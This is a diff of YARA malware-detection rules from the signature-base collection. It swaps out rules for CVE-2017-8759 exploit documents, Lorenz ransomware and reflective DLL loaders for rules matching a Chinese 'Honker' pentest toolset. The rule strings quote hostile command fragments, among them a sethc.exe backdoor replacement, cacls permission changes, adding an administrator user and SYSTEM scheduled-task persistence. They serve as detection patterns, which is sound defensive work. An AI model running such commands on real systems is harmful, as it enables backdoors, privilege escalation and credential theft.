+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1263-L1278"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0c81feebef463fee41661ca951a39ee789db5d36acc8262ddb391609d8680108"
-		score = 75
+		hash = "70b04b910d82b32b90cd7f355a0e3e17dd260cb3"
+		logic_hash = "558abb651ce410520811ca96aaad78710cb9bf597b59ed89d9a678377716d721"
+		score = 70
 		quality = 85
-		tags = "CVE-2017-8759, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6314c5696af4c4b24c3a92b0e92a064aaf04fd56673e830f4d339b8805cc9635"
 
 	strings:
-		$s1 = "soap:wsdl=http://" ascii wide
-		$s2 = "soap:wsdl=https://" ascii wide
-		$s3 = "soap:wsdl=http%3" ascii wide
-		$s4 = "soap:wsdl=https%3" ascii wide
-		$c1 = "Project.ThisDocument.AutoOpen" fullword wide
+		$s0 = "http://cn.bing.com/search?first=1&count=50&q=ip:" fullword wide
+		$s17 = "Team:www.t00ls.net" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 500KB and ( 1 of ( $s* ) and $c1 )
+		uint16( 0 ) == 0x5a4d and filesize < 330KB and all of them
 }
-rule SIGNATURE_BASE_CVE_2017_8759_SOAP_Via_JS : FILE
+rule SIGNATURE_BASE_CN_Honker_Gethashes : FILE
 {
 	meta:
-		description = "Detects SOAP WDSL Download via JavaScript"
+		description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9e96cea3-4282-5f25-ad37-51bd69258790"
-		date = "2017-09-14"
+		id = "b1c5910d-0fb1-547e-92b7-5fcf183e38a6"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/buffaloverflow/status/907728364278087680"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_8759.yar#L47-L61"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1280-L1296"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3c170479283fe859b9ecfba4834396aaf78b375472250a4b188bc913f69c97fd"
-		score = 60
-		quality = 81
+		hash = "dc8bcebf565ffffda0df24a77e28af681227b7fe"
+		logic_hash = "fb5ab5e6d8b522caf27478b0589b39d06b96fb0f913673ede768a814836e11f8"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "GetObject(\"soap:wsdl=https://" ascii wide nocase
-		$s2 = "GetObject(\"soap:wsdl=http://" ascii wide nocase
+		$s0 = "SAM\\Domains\\Account\\Users\\Names registry hive reading error!" fullword ascii
+		$s1 = "GetHashes <SAM registry file> [System key file]" fullword ascii
+		$s2 = "Note: Windows registry file shall begin from 'regf' signature!" fullword ascii
 
 	condition:
-		( filesize < 3KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 87KB and 2 of them
 }
-rule SIGNATURE_BASE_CVE_2017_8759_SOAP_Excel : CVE_2017_8759 FILE
+rule SIGNATURE_BASE_CN_Honker_Hashq_Hashq : FILE
 {
 	meta:
-		description = "Detects malicious files related to CVE-2017-8759"
+		description = "Sample from CN Honker Pentest Toolset - file Hashq.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "940ec910-49a4-5271-97e4-8536db271b80"
-		date = "2017-09-15"
+		id = "4f435edf-28bf-5195-bc22-0d2a7302b312"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/buffaloverflow/status/908455053345869825"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_8759.yar#L63-L76"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1298-L1314"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "adea595b251796e93cdc54cc59198d88a68e28d42899c90721f63f6813df24fe"
-		score = 60
-		quality = 83
-		tags = "CVE-2017-8759, FILE"
+		hash = "7518b647db5275e8a9e0bf4deda3d853cc9d5661"
+		logic_hash = "a71ad182f7dd33790e59badfba6149c6dea627858414f0a8f3e64fd3bb2e2a64"
+		score = 70
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "|'soap:wsdl=" ascii wide nocase
+		$s1 = "Hashq.exe" fullword wide
+		$s5 = "CnCert.Net" fullword wide
+		$s6 = "Md5 query tool" fullword wide
 
 	condition:
-		( filesize < 300KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
 }
-rule SIGNATURE_BASE_CVE_2017_8759_SOAP_Txt : CVE_2017_8759 FILE
+rule SIGNATURE_BASE_CN_Honker_Shiftbackdoor_Server : FILE
 {
 	meta:
-		description = "Detects malicious file in releation with CVE-2017-8759 - file exploit.txt"
+		description = "Sample from CN Honker Pentest Toolset - file Server.dat"
 		author = "Florian Roth (Nextron Systems)"
-		id = "36474420-4fa9-5264-a46b-bb2434624710"
-		date = "2017-09-14"
+		id = "c53f4015-ad2b-5898-88b5-34b3bc2c65b6"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Voulnet/CVE-2017-8759-Exploit-sample"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_8759.yar#L78-L92"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1316-L1333"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "184179006ed2ac2ad76e09c53196805fcb1b7380dab1d5740b4469a89d6b0b32"
-		score = 75
-		quality = 60
-		tags = "CVE-2017-8759, FILE"
+		hash = "b24d761c6bbf216792c4833890460e8b37d86b37"
+		logic_hash = "17f1d7f2345ed1bc9b240c4851f41891244ec9d13b296a24ab6b42cca32ddf87"
+		score = 70
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "840ad14e29144be06722aff4cc04b377364eeed0a82b49cc30712823838e2444"
 
 	strings:
-		$s1 = /<soap:address location="http[s]?:\/\/[^"]{8,140}.hta"/ ascii wide
-		$s2 = /<soap:address location="http[s]?:\/\/[^"]{8,140}mshta.exe"/ ascii wide
+		$s0 = "del /q /f %systemroot%system32sethc.exe" fullword ascii
+		$s1 = "cacls %s /t /c /e /r administrators" fullword ascii
+		$s2 = "\\dllcache\\sethc.exe" ascii
+		$s3 = "\\ntvdm.exe" ascii
 
 	condition:
-		( filesize < 200KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
 }
-rule SIGNATURE_BASE_CVE_2017_8759_WSDL_In_RTF : CVE_2017_8759 FILE
+rule SIGNATURE_BASE_CN_Honker_Exp_Win2003 : FILE
 {
 	meta:
-		description = "Detects malicious RTF file related CVE-2017-8759"
-		author = "Security Doggo @xdxdxdxdoa"
-		id = "daaa5489-af96-5a69-b2dd-81406c0a1edc"
-		date = "2017-09-15"
+		description = "Sample from CN Honker Pentest Toolset - file win2003.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f64e14dd-714c-5a0f-923d-23a584fe605f"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/xdxdxdxdoa/status/908665278199996416"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_8759.yar#L94-L110"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1335-L1351"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "47adc7adfc55239792aef818648546adb1627e74690de0d811100cc49aab8c2f"
-		score = 75
+		hash = "47164c8efe65d7d924753fadf6cdfb897a1c03db"
+		logic_hash = "d1616c53b26eefaa2578efb7defee182e8c88c869cfffb16c8767ddc1869ad46"
+		score = 70
 		quality = 85
-		tags = "CVE-2017-8759, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$doc = "d0cf11e0a1b11ae1"
-		$obj = "\\objupdate"
-		$wsdl = "7700730064006c003d00" nocase
-		$http1 = "68007400740070003a002f002f00" nocase
-		$http2 = "680074007400700073003a002f002f00" nocase
-		$http3 = "6600740070003a002f002f00" nocase
+		$s1 = "Usage:system_exp.exe \"cmd\"" fullword ascii
+		$s2 = "The shell \"cmd\" success!" fullword ascii
+		$s4 = "Not Windows NT family OS." fullword ascii
 
 	condition:
-		uint32be( 0 ) == 0x7B5C7274 and $obj and $doc and $wsdl and 1 of ( $http* )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Lorenz_May21_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Interception3389_Setup : FILE
 {
 	meta:
-		description = "Detects Lorenz Ransomware samples"
+		description = "Sample from CN Honker Pentest Toolset - file setup.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0b18a4a3-82da-574b-8d10-daf2176448b9"
-		date = "2021-05-04"
+		id = "7250ff73-6b08-56a4-b2bc-081060d1fa2d"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "Internal Research - DACH TE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ransom_lorenz.yar#L1-L28"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1353-L1371"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "aec940deb2c3bc099a50a2e8f014ae425d306d331078d9ac2abc2ec7b8bf572e"
-		score = 75
+		hash = "f5b2f86f8e7cdc00aa1cb1b04bc3d278eb17bf5c"
+		logic_hash = "d3f543683810a985a190cc3ea8edb7bfcd316d56a13d45c6532c488a4536ad0a"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "4b1170f7774acfdc5517fbe1c911f2bd9f1af498f3c3d25078f05c95701cc999"
-		hash2 = "8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1"
-		hash3 = "c0c99b141b014c8e2a5c586586ae9dc01fd634ea977e2714fbef62d7626eb3fb"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "process call create \"cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON " ascii fullword
-		$x2 = "-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK" ascii fullword
-		$s1 = "process call create \"cmd.exe /c schtasks /Create /F " ascii fullword
-		$s2 = "twr.ini" ascii fullword
-		$s3 = "/c wmic /node:'" ascii fullword
-		$op1 = { 0f 4f d9 81 ff dc 0f 00 00 5f 8d 4b 0? 0f 4e cb 83 fe 3c 5e 5b }
-		$op2 = { 6a 02 e8 ?? ?? 0? 00 83 c4 18 83 f8 01 75 01 cc 6a 00 68 ?? ?? 00 00 }
+		$s0 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\%s" fullword ascii
+		$s1 = "%s\\temp\\temp%d.bat" fullword ascii
+		$s5 = "EventStartShell" fullword ascii
+		$s6 = "del /f /q \"%s\"" fullword ascii
+		$s7 = "\\wminotify.dll" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4000KB and ( 1 of ( $x* ) or all of ( $op* ) or 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
-
-rule SIGNATURE_BASE_Reflectiveloader : FILE
+rule SIGNATURE_BASE_CN_Honker_Cncert_Ccdoor_CMD_2 : FILE
 {
 	meta:
-		description = "Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended"
+		description = "Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll2"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d8a601d7-b99a-59dc-bfc7-bf0e35b5d8bd"
-		date = "2017-07-17"
-		modified = "2021-03-15"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_loaders.yar#L14-L41"
+		id = "2681a989-6504-5ac7-abc9-e6dad2a052c5"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1373-L1390"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4d839674f8d8181b11af964a7c84a9eb8f07623500dd2695fca9ca3b15c247e2"
+		hash = "7f3a6fb30845bf366e14fa21f7e05d71baa1215a"
+		logic_hash = "8f33f2999eae3f080e8e5ec51ced3e7d596a07b6e5c9830cc1ca552701ed6502"
 		score = 70
 		quality = 85
 		tags = "FILE"
-		nodeepdive = 1
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "ReflectiveLoader" fullword ascii
-		$x2 = "ReflectivLoader.dll" fullword ascii
-		$x3 = "?ReflectiveLoader@@" ascii
-		$x4 = "reflective_dll.x64.dll" fullword ascii
-		$x5 = "reflective_dll.dll" fullword ascii
-		$fp1 = "Sentinel Labs, Inc." wide
-		$fp2 = "Panda Security, S.L." wide ascii
+		$s0 = "cmd.dll" fullword wide
+		$s1 = "cmdpath" fullword ascii
+		$s2 = "Get4Bytes" fullword ascii
+		$s3 = "ExcuteCmd" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or pe.exports ( "ReflectiveLoader" ) or pe.exports ( "_ReflectiveLoader@4" ) or pe.exports ( "?ReflectiveLoader@@YGKPAX@Z" ) ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 22KB and all of them
 }
-
-rule SIGNATURE_BASE_Reflective_DLL_Loader_Aug17_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Exp_Ms11046 : FILE
 {
 	meta:
-		description = "Detects Reflective DLL Loader"
+		description = "Sample from CN Honker Pentest Toolset - file ms11046.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9a2674f8-5fdb-5a4d-a2b9-41e874939616"
-		date = "2017-08-20"
+		id = "aafb45f4-3b42-5c8f-8c25-40fd01217e9d"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_loaders.yar#L53-L76"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1392-L1409"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9ad012dda538d37242c92c6ed16a0fb1cd9252a2884387f8e7d9c80b041c8fea"
-		score = 75
+		hash = "f8414a374011fd239a6c6d9c6ca5851cd8936409"
+		logic_hash = "0496e5c062c1a248b118c2f6009c95bfddf753e5491529d4ec43cfaf1ea0c0c5"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f2f85855914345eec629e6fc5333cf325a620531d1441313292924a88564e320"
 
 	strings:
-		$x1 = "\\Release\\reflective_dll.pdb" ascii
-		$x2 = "reflective_dll.x64.dll" fullword ascii
-		$s3 = "DLL Injection" fullword ascii
-		$s4 = "?ReflectiveLoader@@YA_KPEAX@Z" fullword ascii
+		$s0 = "[*] Token system command" fullword ascii
+		$s1 = "[*] command add user 90sec 90sec" fullword ascii
+		$s2 = "[*] Add to Administrators success" fullword ascii
+		$s3 = "Program: %s%s%s%s%s%s%s%s%s%s%s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "4bf489ae7d1e6575f5bb81ae4d10862f" or pe.exports ( "?ReflectiveLoader@@YA_KPEAX@Z" ) or ( 1 of ( $x* ) or 2 of them ) ) ) or ( 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_DLL_Injector_Lynx : FILE
+rule SIGNATURE_BASE_CN_Honker_Master_Beta_1_7 : FILE
 {
 	meta:
-		description = "Detects Lynx DLL Injector"
+		description = "Sample from CN Honker Pentest Toolset - file Master_beta_1.7.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7a4c9949-c701-5ae2-a8b1-3ef0b08c1c04"
-		date = "2017-08-20"
+		id = "78f904ec-f7cb-5fd0-a117-925ebedd1d3e"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_loaders.yar#L78-L100"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1411-L1426"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1904b152c42126abd87671747dc2733e2a5e2a01ab55346c131fb430fe5ba58e"
-		score = 75
+		hash = "3be7a370791f29be89acccf3f2608fd165e8059e"
+		logic_hash = "13c9cc0bf8aaed2ba86baeee6f0b32bf71108dc1350dcffd03e70393fa975c9f"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d594f60e766e0c3261a599b385e3f686b159a992d19fa624fad8761776efa4f0"
 
 	strings:
-		$x1 = " -p <TARGET PROCESS NAME> | -u <DLL PAYLOAD> [--obfuscate]" fullword wide
-		$x2 = "You've selected to inject into process: %s" fullword wide
-		$x3 = "Lynx DLL Injector" fullword wide
-		$x4 = "Reflective DLL Injector" fullword wide
-		$x5 = "Failed write payload: %lu" fullword wide
-		$x6 = "Failed to start payload: %lu" fullword wide
-		$x7 = "Injecting payload..." fullword wide
+		$s1 = "http://seo.chinaz.com/?host=" fullword ascii
+		$s2 = "Location: getpass.asp?info=" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 800KB and 1 of them ) or ( 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 312KB and all of them
 }
-
-rule SIGNATURE_BASE_Reflective_DLL_Loader_Aug17_2 : FILE
+rule SIGNATURE_BASE_CN_Honker_F4Ck_Team_F4Ck_2 : FILE
 {
 	meta:
-		description = "Detects Reflective DLL Loader - suspicious - Possible FP could be program crack"
+		description = "Sample from CN Honker Pentest Toolset - file f4ck_2.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5948d9ba-e655-5b11-ad74-f650b3a753e7"
-		date = "2017-08-20"
+		id = "b2a9067f-57d0-5b32-87c8-3b635c3944a5"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_loaders.yar#L102-L128"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1428-L1446"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f01b2cf754c3527d0d7fd44c28d3cdb9327762572b43a7d6f7667e5c2a26ab17"
-		score = 60
+		hash = "0783661077312753802bd64bf5d35c4666ad0a82"
+		logic_hash = "85c73d480019929eef5951b0395f49cea86dc83b334860e940cc6e36c2d96d3a"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c2a7a2d0b05ad42386a2bedb780205b7c0af76fe9ee3d47bbe217562f627fcae"
-		hash2 = "b90831aaf8859e604283e5292158f08f100d4a2d4e1875ea1911750a6cb85fe0"
 
 	strings:
-		$x1 = "\\ReflectiveDLLInjection-master\\" ascii
-		$s2 = "reflective_dll.dll" fullword ascii
-		$s3 = "DLL injection" fullword ascii
-		$s4 = "_ReflectiveLoader@4" ascii
-		$s5 = "Reflective Dll Injection" fullword ascii
+		$s1 = "F4ck.exe" fullword wide
+		$s2 = "@Netapi32.dll" fullword ascii
+		$s3 = "Team.F4ck.Net" fullword wide
+		$s8 = "Administrators" fullword ascii
+		$s9 = "F4ck Team" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "59867122bcc8c959ad307ac2dd08af79" or pe.exports ( "_ReflectiveLoader@4" ) or 2 of them ) ) or ( 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 220KB and 2 of them
 }
-
-rule SIGNATURE_BASE_Reflective_DLL_Loader_Aug17_3 : FILE
+rule SIGNATURE_BASE_CN_Honker_Sig_3389_80_Antifw : FILE
 {
 	meta:
-		description = "Detects Reflective DLL Loader"
+		description = "Sample from CN Honker Pentest Toolset - file AntiFW.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "91842f58-5205-533d-9e97-a1e84fbf259d"
-		date = "2017-08-20"
-		modified = "2022-12-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_loaders.yar#L130-L154"
+		id = "761bed41-e8e6-585b-8fde-a6b6a56445d6"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1448-L1466"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4fbba94e6d3dc7b4976c90c0f95683c548f3c444bf5eaf0a7c55d96150978a67"
-		score = 75
+		hash = "5fbc75900e48f83d0e3592ea9fa4b70da72ccaa3"
+		logic_hash = "5e940406b713458ae7168d4e140f15a262b7f0834d29db9c88f1f04bedb41e43"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d10e4b3f1d00f4da391ac03872204dc6551d867684e0af2a4ef52055e771f474"
 
 	strings:
-		$s1 = "\\Release\\inject.pdb" ascii
-		$s2 = "!!! Failed to gather information on system processes! " fullword ascii
-		$s3 = "reflective_dll.dll" fullword ascii
-		$s4 = "[-] %s. Error=%d" fullword ascii
-		$s5 = "\\Start Menu\\Programs\\reflective_dll.dll" ascii
+		$s1 = "Set TS to port:80 Successfully!" fullword ascii
+		$s2 = "Now,set TS to port 80" fullword ascii
+		$s3 = "echo. >>amethyst.reg" fullword ascii
+		$s4 = "del amethyst.reg" fullword ascii
+		$s5 = "AntiFW.cpp" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "26ba48d3e3b964f75ff148b6679b42ec" or 2 of them ) ) or ( 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and 2 of them
 }
-rule SIGNATURE_BASE_Reflective_DLL_Loader_Aug17_4 : FILE
+rule SIGNATURE_BASE_CN_Honker_Wwwscan_Gui : FILE
 {
 	meta:
-		description = "Detects Reflective DLL Loader"
+		description = "Sample from CN Honker Pentest Toolset - file wwwscan_gui.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d2a28ea6-a3f7-5ceb-86fd-1e5b7f916a41"
-		date = "2017-08-20"
+		id = "fffed806-4394-505a-96bd-50bf6f24aefc"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_loaders.yar#L156-L176"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1468-L1483"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b988ea586589dced18f2165eff431be897b3e96fce2d124f5f41d52b520ccd76"
-		score = 75
+		hash = "897b66a34c58621190cb88e9b2a2a90bf9b71a53"
+		logic_hash = "9c25cf33fc2f675c8db7b24f2abe03d54c0ae17927e0ca9ccd3e5b97ffc56f73"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "205b881701d3026d7e296570533e5380e7aaccaa343d71b6fcc60802528bdb74"
-		hash2 = "f76151646a0b94024761812cde1097ae2c6d455c28356a3db1f7905d3d9d6718"
 
 	strings:
-		$x1 = "<H1>&nbsp;>> >> >> Keylogger Installed - %s %s << << <<</H1>" fullword ascii
-		$s1 = "<H3> ----- Running Process ----- </H3>" fullword ascii
-		$s2 = "<H2>Operating system: %s<H2>" fullword ascii
-		$s3 = "<H2>System32 dir:  %s</H2>" fullword ascii
+		$s1 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii
+		$s2 = "/eye2007Admin_login.aspx" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 280KB and all of them
 }
-rule SIGNATURE_BASE_Quarkspwdump_Gen
+rule SIGNATURE_BASE_CN_Honker_Swordcolledition : FILE
 {
 	meta:
-		description = "Detects all QuarksPWDump versions"
+		description = "Sample from CN Honker Pentest Toolset - file SwordCollEdition.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7de4f59e-6cf5-5ad7-ae1f-8532d9e80c9e"
-		date = "2015-09-29"
+		id = "4e8d4d48-c053-5579-be9c-af73ec0fe614"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_quarkspwdump.yar#L2-L24"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1485-L1500"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "327235260076f97c29acc1ca997205d08ef55fad795594fe2268f1d8e666d636"
-		score = 80
+		hash = "6e14f21cac6e2aa7535e45d81e8d1f6913fd6e8b"
+		logic_hash = "bbc5c9bb91bdd60582e2d7f6fa9b1a1cc3799e0809b670d575d9b2c77bf5e884"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2b86e6aea37c324ce686bd2b49cf5b871d90f51cec24476daa01dd69543b54fa"
-		hash2 = "87e4c76cd194568e65287f894b4afcef26d498386de181f568879dde124ff48f"
-		hash3 = "a59be92bf4cce04335bd1a1fcf08c1a94d5820b80c068b3efe13e2ca83d857c9"
-		hash4 = "c5cbb06caa5067fdf916e2f56572435dd40439d8e8554d3354b44f0fd45814ab"
-		hash5 = "677c06db064ee8d8777a56a641f773266a4d8e0e48fbf0331da696bea16df6aa"
-		hash6 = "d3a1eb1f47588e953b9759a76dfa3f07a3b95fab8d8aa59000fd98251d499674"
-		hash7 = "8a81b3a75e783765fe4335a2a6d1e126b12e09380edc4da8319efd9288d88819"
 
 	strings:
-		$s1 = "OpenProcessToken() error: 0x%08X" fullword ascii
-		$s2 = "%d dumped" fullword ascii
